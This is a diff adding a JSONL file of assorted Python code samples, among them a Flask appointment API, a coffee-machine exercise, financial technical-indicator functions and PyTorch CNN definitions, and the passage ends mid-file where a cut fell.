diff --git "a/6339.jsonl" "b/6339.jsonl" new file mode 100644--- /dev/null +++ "b/6339.jsonl" @@ -0,0 +1,738 @@ +{"seq_id":"466999256","text":"import re\nfrom datetime import datetime\nfrom dateutil import tz\n\nvalidLanguages = [\"jp\", \"en\"]\n\nclass UserMeetTime:\n def __init__(self, userInput):\n self.user = userInput.author.mention\n self.isValidInput = True\n self.languageSelected = \"\"\n self.startTime = datetime.now()\n self.endTime = datetime.now()\n self.timezone = \"\"\n self.isMatched = False\n\n\n content = re.split(' ', userInput.content)\n self.checkString(content)\n\n # Refactor this to be more manageable\n def checkString(self, inputStringArray):\n if inputStringArray[1] in validLanguages:\n self.languageSelected = inputStringArray[1]\n else:\n self.isValidInput = False\n\n try:\n print(\"input array 2\" + inputStringArray[2])\n date = inputStringArray[2].replace('/', '/')\n\n baseTime = datetime.strptime(date, '%m/%d')\n\n baseTime = baseTime.replace(year=datetime.now().year)\n\n inputStringArray[3].replace('ー', '-')\n\n times = inputStringArray[3].split('-')\n\n self.startTime = self.generateTimeAttribute(times[0], baseTime)\n self.endTime = self.generateTimeAttribute(times[1], baseTime)\n\n # Need to fix this, timezones require a specific location for tz module\n self.timezone = inputStringArray[4]\n # self.timezone = tz.gettz(inputStringArray[4])\n # self.desiredTime.astimezone(self.timezone)\n except TypeError:\n self.isValidInput = False\n\n def generateTimeAttribute(self, timeStr, dateToReplaceWith):\n timeStr.replace(':', ':')\n\n tmpTime = datetime.strptime(timeStr, \"%H:%M\")\n\n return tmpTime.replace(year=dateToReplaceWith.year, month=dateToReplaceWith.month, day=dateToReplaceWith.day)\n","sub_path":"UserMeetTimeClass.py","file_name":"UserMeetTimeClass.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"408604471","text":"import IDLC.idltypes as IDLTypes\nimport genutil as util\n\ndef Capitalize(s):\n return s[:1].upper() + s[1:]\n\ndef GetTypeCamelNotation(attributeName, attribute, document):\n if not \"type\" in attribute:\n util.fmtError('Attribute type is required. Attribute \"{}\" does not name a type!'.format(attributeName))\n typeString = IDLTypes.ConvertToCamelNotation(attribute[\"type\"])\n\n if not typeString:\n # Figure out what type it actually is.\n if attribute[\"type\"] in document[\"enums\"]:\n typeString = IDLTypes.ConvertToCamelNotation(\"uint\") # type for enums is uint\n else:\n util.fmtError('\"{}\" is not a valid type!'.format(attribute[\"type\"]))\n return typeString\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteAttributeHeaderDeclarations(f, document):\n for attributeName, attribute in document[\"attributes\"].items():\n typeString = IDLTypes.GetTypeString(attribute[\"type\"])\n\n if not \"fourcc\" in attribute:\n util.fmtError('Attribute FourCC is required. Attribute \"{}\" does not have a fourcc!'.format(attributeName))\n fourcc = attribute[\"fourcc\"]\n\n accessMode = \"rw\"\n if \"access\" in attribute:\n accessMode = IDLTypes.AccessModeToClassString(attribute[\"access\"])\n \n defVal = IDLTypes.DefaultValue(attribute[\"type\"])\n if \"default\" in attribute:\n default = IDLTypes.DefaultToString(attribute[\"default\"])\n defVal = \"{}({})\".format(IDLTypes.GetTypeString(attribute[\"type\"]), default)\n\n f.WriteLine('__DeclareAttribute({}, {}, \\'{}\\', {}, {});'.format(Capitalize(attributeName), typeString, fourcc, accessMode, defVal))\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteAttributeSourceDefinitions(f, document):\n for attributeName, attribute in document[\"attributes\"].items():\n typeString = IDLTypes.GetTypeString(attribute[\"type\"])\n\n if not \"fourcc\" in attribute:\n util.fmtError('Attribute FourCC is required. Attribute \"{}\" does not have a fourcc!'.format(attributeName))\n fourcc = attribute[\"fourcc\"]\n\n accessMode = \"rw\"\n if \"access\" in attribute:\n accessMode = IDLTypes.AccessModeToClassString(attribute[\"access\"])\n \n defVal = IDLTypes.DefaultValue(attribute[\"type\"])\n if \"default\" in attribute:\n default = IDLTypes.DefaultToString(attribute[\"default\"])\n defVal = \"{}({})\".format(IDLTypes.GetTypeString(attribute[\"type\"]), default)\n\n f.WriteLine('__DefineAttribute({}, {}, \\'{}\\', {}, {});'.format(Capitalize(attributeName), typeString, fourcc, accessMode, defVal))\n\n#------------------------------------------------------------------------------\n##\n#\ndef WriteEnumeratedTypes(f, document):\n if \"enums\" in document:\n for enumName, enum in document[\"enums\"].items():\n # Declare Enums\n f.InsertNebulaDivider()\n f.WriteLine(\"enum {}\".format(enumName))\n f.WriteLine(\"{\")\n f.IncreaseIndent()\n numValues = 0\n for key, value in enum.items():\n f.WriteLine(\"{} = {},\".format(key, value))\n numValues += 1\n f.WriteLine(\"Num{} = {}\".format(Capitalize(enumName), numValues))\n f.DecreaseIndent()\n f.WriteLine(\"};\")\n f.WriteLine(\"\")","sub_path":"fips-files/generators/IDLC/idlattribute.py","file_name":"idlattribute.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"601319522","text":"from ..models import User, AppointmentEvents, Device, user_device\nfrom .. import db\nfrom . import api\nfrom flask import request, jsonify\nfrom datetime import datetime\nfrom sqlalchemy import and_\nimport re\n\n\n@api.route('/v1.0/data/', methods=['POST'])\ndef return_data(device_id):\n if device_id is None:\n return \"No valid device ID\", 401\n device_id = int(device_id)\n r = (request.stream.read()).decode(\"utf-8\")\n r = re.findall(r'\\d*-\\d*-\\d*', r)\n start = datetime.strptime(r[0], '%Y-%m-%d')\n end = datetime.strptime(r[1], '%Y-%m-%d')\n events = AppointmentEvents.query.filter(\n and_(AppointmentEvents.device_id == device_id,\n AppointmentEvents.start.between(start, end))\n ).all()\n response = []\n for event in events:\n if not event.is_finished:\n response.append({\"title\": event.name + ' Event ID: ' + str(event.id) + ' Remark: ' + str(event.remark),\n \"start\": event.start,\n \"end\": event.end,\n \"id\": event.id})\n else:\n response.append({\"title\": event.name + ' Event ID: ' + str(event.id) + ' Remark: ' + str(event.remark),\n \"start\": event.start,\n \"end\": event.end,\n \"id\": event.id,\n \"color\": 'black',\n \"textColor\": 'white'})\n return jsonify(response), 200\n\n\n@api.route('/v1.0/add//', methods=['POST'])\ndef add_data(token, device_id):\n if token is None:\n return \"No valid token\", 401\n if device_id is None:\n return \"No valid device ID\", 401\n user = User.query.filter_by(avatar_hash=token).first_or_404()\n # devices = user.devices.all()\n device_id = int(device_id)\n # not available?\n # ud = user_device.query.join(User, Device).filter(User.id == user.id,\n # Device.id == device_id).first()\n # if device_id not in devices:\n # if ud is None:\n device = Device.query.filter_by(id=device_id).first_or_404()\n if user not in device.users:\n return \"No permission to access {0}\".format(device_id), 401\n r = request.get_json(force=True)\n\n if r['title'] == '' or r['remark'] == '' or r['start'] == '' or r['end'] == '':\n return jsonify({\"blocked\": 2})\n\n start_date = datetime.strptime(r['start'], '%Y-%m-%dT%H:%M:%S.%fZ')\n end_date = datetime.strptime(r['end'], '%Y-%m-%dT%H:%M:%S.%fZ')\n title = r['title']\n remark = r['remark']\n # print(start_date.time())\n # print(type(title))\n # print(title == '')\n events = AppointmentEvents.query.filter(\n and_(AppointmentEvents.device_id == device_id,\n AppointmentEvents.start.between(start_date, end_date))\n ).all()\n\n if len(events) == 0:\n event_new = AppointmentEvents(name=title, user_id=user.id, device_id=device_id, start=start_date, end=end_date,\n remark=remark)\n db.session.add(event_new)\n db.session.commit()\n else:\n for event in events:\n if not event.is_finished:\n return jsonify({\"blocked\": 3})\n else:\n continue\n\n event_new = AppointmentEvents(name=title, user_id=user.id, device_id=device_id, start=start_date, end=end_date,\n remark=remark)\n db.session.add(event_new)\n db.session.commit()\n\n return jsonify({\"blocked\": 0, \"id\": event_new.id}), 200\n\n\n@api.route('/v1.0/remove//', methods=['POST'])\ndef remove_data(token, device_id):\n if token is None:\n return \"No valid token\", 401\n if device_id is None:\n return \"No valid device ID\", 401\n user = User.query.filter_by(avatar_hash=token).first()\n # privilege = list(map(int, user.privilege.split(',')))\n device_id = int(device_id)\n device = Device.query.filter_by(id=device_id).first_or_404()\n if user not in device.users:\n return \"No permission to access {0}\".format(device_id), 401\n r = request.get_json(force=True)\n event_id = r['event_id']\n event = AppointmentEvents.query.filter_by(id=event_id).first_or_404()\n if user.id == event.user_id and not event.is_finished:\n db.session.delete(event)\n db.session.commit()\n return jsonify({\"id\": event.id}), 200\n elif user.id != event.user_id:\n return \"No permission to access this event\", 401\n else:\n return \"You can Not remove a complete event\", 401\n","sub_path":"test_device_appointment_system/app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368265585","text":"# coding=utf-8\n\nimport pandas as pd\nfrom sinagot.models import Model, Step\nfrom sinagot.utils import LOG_STEP_LABEL, LOG_STEP_STATUS\n\n\nclass StepCollection(Model):\n \"\"\"Manage all steps of a category.\n\n Args:\n model (instance): Parent model of the collection.\n\n Attributes:\n model (instance): Parent model of the collection.\n\n \"\"\"\n\n _MODEL_TYPE = \"step_collection\"\n\n def __init__(self, model):\n\n super().__init__(model.dataset)\n self.model = model\n self.task = self.model.task\n self.modality = self.model.modality\n\n @property\n def _scripts_names(self):\n try:\n sn = self.dataset.config[\"modalities\"][self.modality][\"scripts\"]\n except KeyError:\n return []\n try:\n return (\n sn\n + self.dataset.config[\"modalities\"][self.modality][\"tasks_scripts\"][\n self.task\n ]\n )\n except KeyError:\n return sn\n\n def get_script(self, script_name):\n return self._get_module(\"Script\", self.modality, script_name)\n\n def get(self, script):\n\n return Step(script=script, model=self.model)\n\n def all(self):\n for script_name in self._scripts_names:\n yield self.get(script_name)\n\n def find(self, pattern):\n\n for script_name in self._scripts_names:\n if pattern in script_name:\n yield self.get(script_name)\n\n def first(self):\n \"\"\"Get the first step.\n\n Returns:\n instance: Step instance\n \"\"\"\n\n return self.get(self._scripts_names[0])\n\n def count(self):\n return len(self._scripts_names)\n\n def status(self):\n if self.model._MODEL_TYPE == \"record\":\n if self.count() > 0:\n return pd.DataFrame(\n [\n {\n \"record_id\": self.model.id,\n \"task\": self.task,\n \"modality\": self.modality,\n \"step_index\": index,\n LOG_STEP_LABEL: step.label,\n LOG_STEP_STATUS: step.status(),\n }\n for index, step in zip(range(1, self.count() + 1), self.all())\n ]\n )\n else:\n return None\n elif self.model.count() == 0:\n return None\n else:\n return pd.concat(\n [rec.status() for rec in self.model.all() if rec.status() is not None]\n )\n","sub_path":"sinagot/models/step_collection.py","file_name":"step_collection.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14275821","text":"import data\r\n\r\nmachine_state = True\r\nuser_flavor = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\r\nquarters = 0.25\r\ndimes = 0.10\r\nnickles = 0.05\r\npennies = 0.01\r\nmoney = {\r\n 'money': 0.0\r\n}\r\nwhile machine_state:\r\n def resources():\r\n \"\"\"This function is show the machine resources\"\"\"\r\n print(\"Resources: \")\r\n for i in data.resources:\r\n print(f\" {i}: {data.resources[i]}\")\r\n\r\n\r\n def compare(comp):\r\n \"\"\" This function is return whether the condition is true or not \"\"\"\r\n if comp == 'espresso':\r\n if data.MENU[comp]['ingredients']['water'] <= data.resources['water'] and data.MENU[comp]['ingredients'][\r\n 'coffee'] <= data.resources['coffee']:\r\n return True\r\n else:\r\n report_input = input(\"Can't proceed. Do you want to see the resource 'yes' to view? \").lower\r\n if report_input == 'yes':\r\n resources()\r\n print(\"I don't have a that much of resources.\")\r\n return False\r\n\r\n else:\r\n if data.MENU[comp]['ingredients']['water'] <= data.resources['water'] and data.MENU[comp]['ingredients'][\r\n 'milk'] <= data.resources['milk'] and data.MENU[comp]['ingredients']['coffee'] <= data.resources[\r\n 'coffee']:\r\n return True\r\n else:\r\n report_input = input(\"Can't proceed. Do you want to see the resource 'yes' to view\").lower\r\n if report_input == 'yes':\r\n resources()\r\n print(\"I don't have a that much of resources.\")\r\n return False\r\n\r\n\r\n def flavors(flavor):\r\n \"\"\"\"This function take a flavor as a input\"\"\"\r\n if compare(flavor):\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n print(f\"The total cost around : {data.MENU[flavor]['cost']}\")\r\n us_quarters = int(input(\"quarters: \"))\r\n us_dimes = int(input(\"dimes: \"))\r\n us_nickles = int(input(\"nickles: \"))\r\n us_pennies = int(input(\"pennies: \"))\r\n user_answer = (quarters * us_quarters) + (dimes * us_dimes) + (nickles * us_nickles) + (\r\n pennies * us_pennies)\r\n if data.MENU[flavor]['cost'] <= user_answer:\r\n if data.MENU[flavor]['cost'] < user_answer:\r\n extra_money = float(user_answer - data.MENU[flavor]['cost'])\r\n print(f\"Here is your {extra_money} dollars in change\")\r\n if flavor == 'espresso':\r\n data.resources['water'] = data.resources['water'] - data.MENU[flavor]['ingredients']['water']\r\n data.resources['coffee'] = data.resources['coffee'] - data.MENU[flavor]['ingredients']['coffee']\r\n money['money'] += data.MENU[flavor]['cost']\r\n print(\"process complete.............. Enjoy your coffee ...\")\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n make_coffee_again = input(\"Do you want to make another coffeee? type 'yes' to make or 'off' to \"\r\n \"off the coffee machine: \").lower()\r\n if make_coffee_again == 'yes':\r\n new_input = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\r\n flavors(new_input)\r\n if make_coffee_again == 'off':\r\n print(\"machine off...\")\r\n global machine_state\r\n machine_state = False\r\n else:\r\n data.resources['water'] = data.resources['water'] - data.MENU[flavor]['ingredients']['water']\r\n data.resources['milk'] = data.resources['milk'] - data.MENU[flavor]['ingredients']['milk']\r\n data.resources['coffee'] = data.resources['coffee'] - data.MENU[flavor]['ingredients']['coffee']\r\n money['money'] += data.MENU[flavor]['cost']\r\n print(\"process complete.............. Enjoy your coffee ...\")\r\n resources()\r\n print(f\" Money: {money['money']}\")\r\n make_coffee_again = input(\"Do you want to make another coffeee? type 'yes' to make or 'off' to \"\r\n \"off the coffee machine: \")\r\n if make_coffee_again == 'yes':\r\n new_input = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\r\n flavors(new_input)\r\n elif make_coffee_again == 'off':\r\n print(\"machine off...\")\r\n machine_state = False\r\n else:\r\n print(\"sorry that's not enough money . Money refunded .\")\r\n print(\"machine off...\")\r\n machine_state = False\r\n\r\n\r\n flavors(user_flavor)","sub_path":"Coffee_machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254633357","text":"# Ejercicio 2.11: Escribir un programa que pida al usuario un número entero y muestre por pantalla si es par o\n# impar.\n\n\nclass Numbers:\n '''\n Recibe el numero del terminal y verifica que el input sea un numero\n y no un string\n '''\n def __init__(self):\n self.number = 0\n \n def get_input(self):\n valid = False\n while not valid:\n try:\n inp = input(\"Ingrese un numero: \")\n self.number = int(inp)\n valid = True\n except ValueError:\n print(\"Las letras no son numeros :/ Por favor escriba un numero\")\n\n def check_odd_even(self):\n '''\n Revisa si el numero ingresado en el terminal es positivo o negativo y par o \n impar, e imprime el resultado de la verificacion\n '''\n self.get_input()\n if self.number > 0:\n if self.number % 2 == 0:\n print(f\"El numero {self.number} es un numero par y positivo\")\n else:\n print(f\"El numero {self.number} es un numero impar y positivo\")\n if self.number < 0:\n if self.number % 2 == 0:\n print(f\"El numero {self.number} es un numero par y negativo\")\n else:\n print(f\"El numero {self.number} es un numero impar y negativo\")\n if self.number == 0:\n print(f\"El numero {self.number} es tecnicamente considerado par\")\n\ndata = Numbers().check_odd_even()","sub_path":"prepas_ejercicios/2_semana/prepa2.11.py","file_name":"prepa2.11.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162642930","text":"# coding=utf-8\n\"\"\"\nCreated by Jayden.jeon @ Dunamu datavalue lab\n\n다음 스크립트에서 포함하고 있는 기술적 지표는 다음과 같다.\n\n대부분의 계산에서 평균을 계산할때 사용하는 period-length 는 변수로 남겨두었다.\n(default setting 의 경우 trading view 의 세팅과 동일하게 해놓음)\n\n\n########################################################\n########################################################\n########################################################\nStochastic Oscillator :\n\nreference\nhttps://www.investopedia.com/terms/s/stochasticoscillator.asp#:~:text=A%20stochastic%20oscillator%20is%20a,moving%20average%20of%20the%20result.\n\n스토캐스틱 지표\n\ninput\nclosing_price (list): 종가의 리스트\nK (int): Slow stochastic 추출 파라미터\nD (int): Fast stochastic 추출 파라미터\n\noutput\n\ndictionary\n{\n 'l_k': K 기간동안의 최저가\n 'h_k': K 기간동안의 최고가\n 'per_k': Stochastic indicator (slow)\n 'per_d': Stochastic indicator (fast)\n}\n\n########################################################\n########################################################\n########################################################\nRSI :\n\nreference : https://www.macroption.com/rsi-calculation/\n\nα = 1 / N\nand therefore 1 – α = ( N – 1 ) / N\nwhere, N = RSI period\n\nFor example, if N is 14, RSI formula for average up move is:\nAvgUt = 1/14 * Ut + 13/14 * AvgUt-1\n\n\ninput\nclosing_price (list): 종가의 리스트\nn (int): RSI period\navg_method (function): 평균 계산 법\n\noutput\n\ndictionary\n{\n 'avg_u': 평균 상승\n 'avg_d': 평균 하락\n 'rsi': rsi value\n}\n\n\n\n########################################################\n########################################################\n########################################################\nMACD :\n\nreference : https://www.investopedia.com/terms/m/macd.asp\n\nMACD 계산법 : ema_fast_row - ema_slow_row\nsignal 계산법 : macd_row 의 ema\n\ninput\nclosing_price (list): 종가의 리스트\nfast (int): fast_ema period\nslow (int): slow_ema period\nsignal (int): signal_ema period\n\noutput\n\ndictionary\n{\n 'ema_fast': ema_fast_row,\n 'ema_slow': ema_slow_row,\n 'macd': macd_row,\n 'signal': signal_row\n}\n\n\n########################################################\n########################################################\n########################################################\nmoving average :\n\nreference : https://www.investopedia.com/terms/m/macd.asp\n\nMACD 계산법 : ema_fast_row - ema_slow_row\nsignal 계산법 : macd_row 의 ema\n\ninput\nprice_row (list): 가격의 리스트\nn (int): period\n\noutput\naverage_row (list) : 평균가격 리스트\n\n\n########################################################\n########################################################\n########################################################\ndmi (Directional Movement Index) :\n\nreference :\nhttps://coolbingle.blogspot.com/2019/03/using-spreadsheet-to-produce-dmi.html\nhttps://www.fidelity.com/learning-center/trading-investing/technical-analysis/technical-indicator-guide/dmi\n\n\ninput\nprice_open (list): 시가 리스트\nprice_high (list): 고가 리스트\nprice_low (list): 저가 리스트\nprice_close (list): 종가 리스트\nn (int): di_length parameter\nm (int): adx_smoothing parameter\n\noutput\ndictionary\n{\n 'di_plus': di_p_row,\n 'di_minus': di_m_row,\n 'avg_dx': avg_dx_row\n}\n\n\n########################################################\n########################################################\n########################################################\nBollinger (Bollinger band) :\n\nreference :\nhttps://www.investopedia.com/terms/b/bollingerbands.asp\n\ninput\nprice_row (list): 가격 리스트\nlength (int): used to calculate ma\nstdev (int): bollinger band range\n\noutput\ndictionary\n{\n 'b_upper': bollinger_upper,\n 'b_middle': moving_average,\n 'b_lower': bollinger_lower,\n}\n\n\"\"\"\n\nimport numpy as np\nfrom . import zigzag\nfrom . import strategy\n\nclass Helper:\n def __init__(self):\n return\n\n # simple moving average\n @staticmethod\n def sma(row, n):\n if len(row) == 0: return 0\n return np.sum(row) / n\n\n # exponential moving average\n @staticmethod\n def ema(prev_avg, incoming_val, n):\n alpha = 2 / (n + 1)\n return_val = alpha * incoming_val + (1 - alpha) * prev_avg\n return return_val\n\n @staticmethod\n def get_ema_row(row, n):\n ema_row = []\n for i, val in enumerate(row):\n if i < n - 1:\n ema_row.append(-1)\n elif i == n - 1:\n input_row = row[i - n + 1:i + 1]\n ema_row.append(np.average(input_row))\n\n else:\n ema_val = Helper.ema(ema_row[-1], val, n)\n ema_row.append(ema_val)\n\n return ema_row\n\n\n # wilder's smoothing method\n @staticmethod\n def wilder(row, n):\n avg_t = 0\n if len(row) == 0: return 0\n alpha = 1 / n\n for i, value in enumerate(row):\n if i == 0:\n avg_t = value\n else:\n avg_t = alpha * value + (1 - alpha) * avg_t\n return avg_t\n\n\n\n\n\nclass Indicator:\n def __init__(self):\n return\n\n @staticmethod\n def stochastic_oscillator(closing_price, k=14, d=3):\n # 가장 최근의(마지막 trade_price)\n l_k = []\n h_k = []\n per_k = []\n per_d = []\n for i, val in enumerate(closing_price):\n if i < k - 1:\n l_k.append(0)\n h_k.append(0)\n per_k.append(0)\n else:\n l_val = np.min(closing_price[i - k + 1:i + 1])\n h_val = np.max(closing_price[i - k + 1:i + 1])\n l_k.append(l_val)\n h_k.append(h_val)\n per_k_val = 100 * (val - l_val) / (h_val - l_val)\n per_k.append(per_k_val)\n\n for i, val in enumerate(per_k):\n if i < k + d - 1:\n per_d.append(0)\n else:\n per_d.append(np.average(per_k[i - d:i + 1]))\n return {\n 'l_k': l_k,\n 'h_k': h_k,\n 'per_k': per_k,\n 'per_d': per_d,\n }\n\n\n @staticmethod\n def rsi(closing_price, n=14, avg_method=Helper.sma):\n # rsi step1\n # 100 - (100/1+ avg_gain/avg_loss)\n # get n days info\n date_val = closing_price[1:].values\n pre_date_val = closing_price[:-1].values\n change_row = np.append(0, date_val - pre_date_val)\n\n avg_u = []\n avg_d = []\n rsi_row = []\n\n for i, val in enumerate(closing_price):\n if i < n - 1:\n avg_u.append(0)\n avg_d.append(0)\n rsi_row.append(0)\n else:\n temp_row = change_row[i - n:i + 1]\n u_row = temp_row[temp_row >= 0]\n d_row = np.abs(temp_row[temp_row < 0])\n avg_u_val = avg_method(u_row, n)\n avg_d_val = avg_method(d_row, n)\n if avg_d_val == 0:\n rsi = 1\n else:\n rs = avg_u_val / avg_d_val\n rsi = 100 * (1 - 1 / (1 + rs))\n avg_u.append(avg_u_val)\n avg_d.append(avg_d_val)\n rsi_row.append(rsi)\n\n return {\n 'avg_u': avg_u,\n 'avg_d': avg_d,\n 'rsi': rsi_row\n }\n\n\n\n @staticmethod\n def macd(closing_price, fast=12, slow=26, sig=9):\n if slow <= fast:\n print('ERRRR')\n return None\n ema_fast_row = np.array(Helper.get_ema_row(closing_price, fast))\n ema_slow_row = np.array(Helper.get_ema_row(closing_price, slow))\n macd_row = ema_fast_row - ema_slow_row\n macd_row[:slow] = 0\n signal_row = np.array(Helper.get_ema_row(macd_row, sig))\n\n return {\n 'ema_fast': ema_fast_row,\n 'ema_slow': ema_slow_row,\n 'macd': macd_row,\n 'signal': signal_row\n }\n\n\n\n @staticmethod\n def moving_average(price_row, n):\n average_row = []\n for i, value in enumerate(price_row):\n if i < n - 1:\n average_row.append(0)\n else:\n input_row = price_row[i - n + 1:i + 1]\n average_row.append(np.average(input_row))\n return average_row\n\n\n @staticmethod\n def dmi(price_open, price_high, price_low, price_close, n=14, m=14):\n true_range_row = []\n dm_plus_row = []\n dm_minus_row = []\n\n for i, val in enumerate(zip(price_open, price_high, price_low, price_close)):\n if i == 0:\n true_range_row.append(0)\n dm_plus_row.append(0)\n dm_minus_row.append(0)\n continue\n\n (o, h, l, c) = val\n prev_c = price_close[i - 1]\n prev_h = price_high[i - 1]\n prev_l = price_low[i - 1]\n\n candidate_1 = h - l\n candidate_2 = abs(h - prev_c)\n candidate_3 = abs(l - prev_c)\n\n true_range = max(candidate_1, candidate_2, candidate_3)\n\n if h - prev_h > prev_l - l:\n dm_plus0 = max(h - prev_h, 0)\n else:\n dm_plus0 = 0\n\n if prev_l - l > h - prev_h:\n dm_minus0 = max(prev_l - l, 0)\n else:\n dm_minus0 = 0\n\n if dm_plus0 > dm_minus0:\n dm_plus = dm_plus0\n dm_minus = 0\n\n elif dm_plus0 < dm_minus0:\n dm_minus = dm_minus0\n dm_plus = 0\n else:\n dm_minus, dm_plus = 0, 0\n\n true_range_row.append(true_range)\n dm_plus_row.append(dm_plus)\n dm_minus_row.append(dm_minus)\n\n avg_true_range_row = []\n avg_dm_plus_row = []\n avg_dm_minus_row = []\n\n di_p_row = []\n di_m_row = []\n dx_row = []\n\n for i, val in enumerate(zip(true_range_row, dm_plus_row, dm_minus_row)):\n (tr, dm_p, dm_m) = val\n\n if i < n - 1:\n avg_true_range_row.append(0)\n avg_dm_plus_row.append(0)\n avg_dm_minus_row.append(0)\n\n di_p_row.append(0)\n di_m_row.append(0)\n dx_row.append(0)\n continue\n\n elif i == n - 1:\n avg_tr = np.average(true_range_row[i - (n - 1):i + 1])\n avg_dm_p = np.average(dm_plus_row[i - (n - 1):i + 1])\n avg_dm_m = np.average(dm_minus_row[i - (n - 1):i + 1])\n\n else:\n avg_tr_p = avg_true_range_row[-1]\n avg_dm_p_p = avg_dm_plus_row[-1]\n avg_dm_m_p = avg_dm_minus_row[-1]\n\n avg_tr = avg_tr_p + (tr - avg_tr_p) / n\n avg_dm_p = avg_dm_p_p + (dm_p - avg_dm_p_p) / n\n avg_dm_m = avg_dm_m_p + (dm_m - avg_dm_m_p) / n\n\n\n di_p = avg_dm_p / avg_tr\n di_m = avg_dm_m / avg_tr\n dx = 100 * abs(avg_dm_p - avg_dm_m) / (avg_dm_p + avg_dm_m)\n\n di_p_row.append(di_p)\n di_m_row.append(di_m)\n dx_row.append(dx)\n\n avg_true_range_row.append(avg_tr)\n avg_dm_plus_row.append(avg_dm_p)\n avg_dm_minus_row.append(avg_dm_m)\n\n\n\n\n avg_dx_row = []\n\n for i, dx in enumerate(dx_row):\n if (dx == 0) or (i < m - 1):\n avg_dx_row.append(0)\n continue\n # 맨 처음 들어오는 value\n if avg_dx_row[-1] == 0:\n avg_dx_row.append(dx)\n\n else:\n adx_p = avg_dx_row[-1]\n adx = adx_p + (dx - adx_p) / m\n avg_dx_row.append(adx)\n\n return {\n 'di_plus': di_p_row,\n 'di_minus': di_m_row,\n 'avg_dx': avg_dx_row\n }\n\n\n @staticmethod\n def bollinger_band(price_row, length=20, stdev=2):\n average_row = []\n upper_row = []\n lower_row = []\n position_row = []\n\n for i, value in enumerate(price_row):\n if i < length - 1:\n average_row.append(0)\n upper_row.append(0)\n lower_row.append(0)\n position_row.append(0)\n else:\n input_row = price_row[i - length + 1:i + 1]\n average_row.append(np.average(input_row))\n stdev_val = np.std(input_row)\n upper_row.append(np.average(input_row)+stdev*stdev_val)\n lower_row.append(np.average(input_row)-stdev*stdev_val)\n # 현재 가격이 볼린저밴드에서 위치한 곳\n position = (value-np.average(input_row))/stdev_val\n position_row.append(position)\n\n return {\n 'b_upper': upper_row,\n 'b_middle': average_row,\n 'b_lower': lower_row,\n 'b_position': position_row\n }\n\n\n","sub_path":"external_lib/technical_indicators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"584000442","text":"import numpy as np\n\n\ndef one_hot(y):\n \"\"\"\n Create a one hot matrix from a vector of values.\n\n :param y: a vector of integer values representing the index at which the value 1 is inserted .\n :return: a one hot matrix with n fields.\n \"\"\"\n n_values = np.max(y) + 1\n return np.eye(n_values)[y]\n\n\ndef batch_iterator(x, batch_size=64):\n \"\"\"\n Split data x into equal sized chunks.\n\n :param x: an iterable input.\n :param batch_size: the size to split a batch into.\n :return: yield iterable of size batch_size\n \"\"\"\n n_samples = x.shape[0]\n n_batches = n_samples // batch_size\n batch_end = 0\n\n for b in range(n_batches):\n batch_begin = b * batch_size # our beginning index for this batch\n batch_end = batch_begin + batch_size # our end index for this batch\n\n x_batch = x[batch_begin:batch_end]\n\n yield x_batch\n\n if n_batches * batch_size < n_samples:\n yield x[batch_end:]\n","sub_path":"mla/utils/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"457617983","text":"#net_model\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torch\n\ndef conv3x3(in_channel, out_channel, stride=1):\n\t\treturn nn.Conv2d(in_channel, out_channel, 3, stride=stride, padding=1, bias=False)\n\n\t\t\nclass CNN2(nn.Module):\n def __init__(self):\n super(CNN2, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(\n in_channels=1,\n out_channels=16,\n kernel_size=5,\n stride=1,\n padding=2\n ),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2))\n self.conv2 = nn.Sequential(\n nn.Conv2d(16, 32, 5, 1, 2), \n nn.ReLU(), \n nn.MaxPool2d(2))\n self.out = nn.Linear(32*7*7, 10)\n \n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size(0), -1)\n output = self.out(x)#logit输出,如果loss函数为mse,则还要进行softmax\n return output#, x\n\t\t\n\n\t\t\nclass CNN(nn.Module):#这是mnist专用28*28\n\tdef __init__(self):\n\t\tsuper(CNN, self).__init__()\n\t\tself.conv1 = nn.Sequential( # input shape (1, 28, 28)\n\t\t\tnn.Conv2d(\n\t\t\t\tin_channels=1, # input height\n\t\t\t\tout_channels=32, # n_filters\n\t\t\t\tkernel_size=5, # filter size\n\t\t\t\tstride=1, # filter movement/step\n\t\t\t\tpadding=2, # if want same width and length of this image after Conv2d, padding=(kernel_size-1)/2 if stride=1\n\t\t\t), # output shape (16, 28, 28)\n\t\t\tnn.ReLU(), # activation\n\t\t\tnn.MaxPool2d(kernel_size=2), # choose max value in 2x2 area, output shape (16, 14, 14)\n\t\t\tnn.BatchNorm2d(32),\n\t\t)\n\t\tself.conv2 = nn.Sequential( # input shape (16, 14, 14)\n\t\t\tnn.Conv2d(32, 64, 5, 1, 2), # output shape (32, 14, 14)\n\t\t\tnn.ReLU(), # activation\n\t\t\tnn.MaxPool2d(2), # output shape (32, 7, 